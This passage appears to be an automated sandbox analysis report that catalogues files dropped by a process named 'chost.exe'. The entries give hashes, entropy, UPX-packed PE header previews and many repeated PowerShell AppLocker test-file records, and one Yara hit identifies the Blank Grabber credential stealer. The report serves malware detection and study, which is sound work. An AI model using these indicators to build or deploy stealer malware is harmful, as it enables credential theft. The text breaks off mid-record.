                                                                                                                                                                                                                                      SHA-512:8820D297AEDA5A5EBE1306E7664F7A95421751DB60D71DC20DA251BCDFDC73F3FD0B22546BD62E62D7AA44DFE702E4032FE78802FB16EE6C2583D65ABC891CBF
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".@................................................................`.....................................................................P.......................................................@...........................................UPX0....................................UPX1.....@.......<..................@...UPX2.................@..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\chost.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):227096
                                                                                                                                                                                                                                      Entropy (8bit):7.928768674438361
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:6144:PpEswYxCQyTp2Z/3YUtoQe5efEw+OXDbM3nFLQdFM4mNJQ:PpAqo92h3Y660Ew+OTbAFLQd2lw
                                                                                                                                                                                                                                      MD5:B2E766F5CF6F9D4DCBE8537BC5BDED2F
                                                                                                                                                                                                                                      SHA1:331269521CE1AB76799E69E9AE1C3B565A838574
                                                                                                                                                                                                                                      SHA-256:3CC6828E7047C6A7EFF517AA434403EA42128C8595BF44126765B38200B87CE4
                                                                                                                                                                                                                                      SHA-512:5233C8230497AADB9393C3EE5049E4AB99766A68F82091FE32393EE980887EBD4503BF88847C462C40C3FC786F8D179DAC5CB343B980944ADE43BC6646F5AD5A
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l.>..|m..|m..|m.u.m..|m+.}l..|m.u}l..|m+..l..|m+.xl..|m+.yl..|m..}l..|m..}m..|m..xl..|m..|l..|m...m..|m..~l..|mRich..|m................PE..d......f.........." ...(.....P...... z....................................................`............................................,C......8............ ...M.................................................. ...@...........................................UPX0....................................UPX1................................@....rsrc....P.......L..................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\chost.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1808664
                                                                                                                                                                                                                                      Entropy (8bit):7.993757523155339
                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                      SSDEEP:24576:xKveD1e+vwrto8RBt0I7Y2OCQNGucXFIRJQmThODxHtSRi+++q+nSWACTpoYqtOU:e+vyhC+vgNGtUth6SRijWAdY7bpX/YCy
                                                                                                                                                                                                                                      MD5:6F7C42579F6C2B45FE866747127AEF09
                                                                                                                                                                                                                                      SHA1:B9487372FE3ED61022E52CC8DBD37E6640E87723
                                                                                                                                                                                                                                      SHA-256:07642B6A3D99CE88CFF790087AC4E2BA0B2DA1100CF1897F36E096427B580EE5
                                                                                                                                                                                                                                      SHA-512:AADF06FD6B4E14F600B0A614001B8C31E42D71801ADEC7C9C177DCBB4956E27617FA45BA477260A7E06D2CA4979ED5ACC60311258427EE085E8025B61452ACEC
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D..Z%..Z%..Z%......X%....e.T%......^%......R%......W%..S]..@%...]..Q%..Z%..*$..O....%..O...[%..O.g.[%..O...[%..RichZ%..........PE..d...=b.f.........." ...(..........P. Yk...P..................................Pl...........`.........................................H.k.d....yk......pk......._.xI...........Ll. ...........................Pek.(....ek.@...........................................UPX0......P.............................UPX1..........P.....................@....rsrc........pk.....................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\chost.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):630736
                                                                                                                                                                                                                                      Entropy (8bit):6.409476333013752
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12288:3lPCcFDlj+gV4zOifKlOWVNcjfQww0S5JPgdbBC9qxbYG9Y:3lPCcvj+YYrfSOWVNcj1JS5JPgdbBCZd
                                                                                                                                                                                                                                      MD5:9C223575AE5B9544BC3D69AC6364F75E
                                                                                                                                                                                                                                      SHA1:8A1CB5EE02C742E937FEBC57609AC312247BA386
                                                                                                                                                                                                                                      SHA-256:90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213
                                                                                                                                                                                                                                      SHA-512:57663E2C07B56024AAAE07515EE3A56B2F5068EBB2F2DC42BE95D1224376C2458DA21C965AAB6AE54DE780CB874C2FC9DE83D9089ABF4536DE0F50FACA582D09
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@.a.@.a.@.a..v..F.a..v....a..v..M.a..J..B.a.{.b.H.a.{.d.j.a.{.e.U.a.I..K.a.@.`...a..d...a....A.a..c.A.a.Rich@.a.................PE..d....~.^.........."..........2.................@.............................p.......4....`..................................................]..x.......Xy......pD...`...?...`..........T...................x...(.......................@............................text...C........................... ..`.rdata..:p.......r..................@..@.data............2...b..............@....pdata..pD.......F..................@..@.tls................................@....rsrc...Xy.......z..................@..@.reloc.......`.......V..............@..B................................................................................................................................................................................................
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\chost.exe
                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):456
                                                                                                                                                                                                                                      Entropy (8bit):4.447296373872587
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12:Bn9j9sxpCDPxfhKLiaE5cNH0u/OCIhjWO:B9jiWDpf025cNU7CIEO
                                                                                                                                                                                                                                      MD5:4531984CAD7DACF24C086830068C4ABE
                                                                                                                                                                                                                                      SHA1:FA7C8C46677AF01A83CF652EF30BA39B2AAE14C3
                                                                                                                                                                                                                                      SHA-256:58209C8AB4191E834FFE2ECD003FD7A830D3650F0FD1355A74EB8A47C61D4211
                                                                                                                                                                                                                                      SHA-512:00056F471945D838EF2CE56D51C32967879FE54FCBF93A237ED85A98E27C5C8D2A39BC815B41C15CAACE2071EDD0239D775A31D1794DC4DBA49E7ECFF1555122
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Yara Hits:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\_MEI43362\rarreg.key, Author: Joe Security
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:RAR registration data.Blank-c.Stealer License.UID=e7ae0ee11c8703113d95.64122122503d95ca34668bc2ffb72bcf8579be24bc20f3cd84baaf.afcf62e30badf158ad0c60feb872189f288e79eb40c28ca0ab6407.3a46f47624f80a44a0e4d71ef4224075bf9e28fce340a29099d287.15690be6b591c3bb355e99d6d1b8ffcd69602cb8aaa6dedf268c83.55c1fb90c384a926139625f6c0cbfc57a96996fdb04075bf9e28fc.e340a29067e9237e333577d2c7f3ed1d0f63287f74c9e50c60d76d.b5915ff59f78103d48e0826658d72ba8813da4a649711057613203.
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\chost.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):26392
                                                                                                                                                                                                                                      Entropy (8bit):7.472291707368108
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:768:jGXeQMA/vR3poDmIMQGnq5YiSyv4AMxkEFNnq:jBA/ADmIMQGno7Sy+x7q
                                                                                                                                                                                                                                      MD5:9A59688220E54FEC39A6F81DA8D0BFB0
                                                                                                                                                                                                                                      SHA1:07A3454B21A831916E3906E7944232512CF65BC1
                                                                                                                                                                                                                                      SHA-256:50E969E062A80917F575AF0FE47C458586EBCE003CF50231C4C3708DA8B5F105
                                                                                                                                                                                                                                      SHA-512:7CB7A039A0A1A7111C709D22F6E83AB4CB8714448DADDB4D938C0D4692FA8589BAA1F80A6A0EB626424B84212DA59275A39E314A0E6CCAAE8F0BE1DE4B7B994E
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........t..'..'..'..g'..'-..&..'-..&..'-..&..'-..&..'...&..'..'...'...&..'...&..'...&..'...'..'...&..'Rich..'................PE..d...`b.f.........." ...(.0..........0.....................................................`......................................... ...L....................`..............l.......................................@...@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\chost.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):660248
                                                                                                                                                                                                                                      Entropy (8bit):7.992717999936054
                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                      SSDEEP:12288:ajFc9XUn2iq3Z7tTogf3AKuApDVPXyHaDRtIRqMo4UE0AzcaNRkmg:/98qt37rXy6N60MolE0scaUmg
                                                                                                                                                                                                                                      MD5:DE562BE5DE5B7F3A441264D4F0833694
                                                                                                                                                                                                                                      SHA1:B55717B5CD59F5F34965BC92731A6CEA8A65FD20
                                                                                                                                                                                                                                      SHA-256:B8273963F55E7BF516F129AC7CF7B41790DFFA0F4A16B81B5B6E300AA0142F7E
                                                                                                                                                                                                                                      SHA-512:BAF1FBDD51D66EA473B56C82E181582BF288129C7698FC058F043CCFBCEC1A28F69D89D3CFBFEE77A16D3A3FD880B3B18FD46F98744190D5B229B06CF07C975A
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........tB..,...,...,..m....,.D.-...,.D./...,.D.(...,.D.)...,..m-...,...-...,...$...,...,...,......,.......,.Rich..,.........PE..d....b.f.........." ...(.....0...........................................................`..............................................#..............................................................................@...........................................UPX0....................................UPX1................................@....rsrc....0.......0..................@......................................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\chost.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1016584
                                                                                                                                                                                                                                      Entropy (8bit):6.669319438805479
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24576:VkmZDEMHhp9v1Ikbn3ND0TNVOsIut8P4zmxvSZX0yplkA:mmZFHhp9v1Io3h0TN3pvkA
                                                                                                                                                                                                                                      MD5:0E0BAC3D1DCC1833EAE4E3E4CF83C4EF
                                                                                                                                                                                                                                      SHA1:4189F4459C54E69C6D3155A82524BDA7549A75A6
                                                                                                                                                                                                                                      SHA-256:8A91052EF261B5FBF3223AE9CE789AF73DFE1E9B0BA5BDBC4D564870A24F2BAE
                                                                                                                                                                                                                                      SHA-512:A45946E3971816F66DD7EA3788AACC384A9E95011500B458212DC104741315B85659E0D56A41570731D338BDF182141C093D3CED222C007038583CEB808E26FD
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........W..l9F.l9F.l9F...F.l9F.l8F.l9F...F.l9F..9G.l9F..:G.l9F..<G.l9F..7G.n9F..=G.l9F...F.l9F..;G.l9FRich.l9F........PE..d.....}X.........." .........`............................................................`A................................................p......................F...=......p...PX..T............................'...............O...............................text............................... ..`.rdata..<u.......v..................@..@.data....$...........r..............@....pdata.............................@..@.rsrc................4..............@..@.reloc..p............:..............@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\chost.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):303384
                                                                                                                                                                                                                                      Entropy (8bit):7.985402489277108
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:6144:RuQ0qZzMWlZe6+dTxmH1wne4P7dK5H4lT3yfd6o0VSi2Erk8BnJ1KZeA:RuQ0wAWlc6+dg1wb7/82UUrk8BnJ15A
                                                                                                                                                                                                                                      MD5:2730C614D83B6A018005778D32F4FACA
                                                                                                                                                                                                                                      SHA1:611735E993C3CC73ECCCB03603E329D513D5678A
                                                                                                                                                                                                                                      SHA-256:BAA76F6FD87D7A79148E32D3AE38F1D1FE5A98804B86E636902559E87B316E48
                                                                                                                                                                                                                                      SHA-512:9B391A62429CD4C40A34740DDB04FA4D8130F69F970BB94FA815485B9DA788BCA28681EC7D19E493AF7C99A2F3BF92C3B53339EF43AD815032D4991F99CC8C45
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#.}.#.}.#.}.*..%.}..*|.!.}..*~. .}..*y.+.}..*x...}.6-|. .}.h.|.!.}.#.|.s.}.6-p.".}.6-}.".}.6-..".}.6-..".}.Rich#.}.........PE..d...`b.f.........." ...(.`....... ......0................................................`.............................................X....................@.........................................................@...........................................UPX0..... ..............................UPX1.....`...0...`..................@....rsrc................d..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
